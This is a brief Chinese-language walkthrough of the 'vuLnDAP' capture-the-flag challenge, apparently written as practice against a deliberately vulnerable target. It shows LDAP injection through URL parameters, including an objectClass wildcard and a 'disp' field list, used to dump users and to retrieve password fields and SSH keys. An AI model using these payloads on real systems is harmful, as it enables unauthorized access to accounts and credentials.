vuLnDAP Walkthrough
这是关于vuLnDAP挑战的完整演练过程。当然可能存在其他解决方法,本文仅展示个人实现路径。如果您有更优方案,欢迎交流。
初始探测
- 访问库存控制系统,选择水果分类时观察到URL结构:
1
/fruit_or_veg?objectClass=fruits
- 此处存在首个注入点,可通过通配符
*
获取系统所有对象(含用户和组):1
/fruit_or_veg?objectClass=*
用户信息提取
选定CEO用户Fred后,发现URL包含显示控制参数:
|
|
disp
参数控制LDAP查询返回字段- 通过研究
posixAccount
标准架构,补充关键字段:1
/item?cn=fred&disp=description,cn,uidNumber,gidNumber,homedirectory,userpassword
SSH密钥泄露
- 添加
sshPublicKey
字段成功获取Fred的公钥:1
/item?cn=fred&disp=...,sshPublicKey
- 检查其他用户时发现意外泄露的私钥:
技术要点
userpassword
字段仅用于认证不可读取- 通过标准LDAP架构研究确定关键字段名
- 实际渗透中需验证密钥有效性(演示密钥已做无效化处理)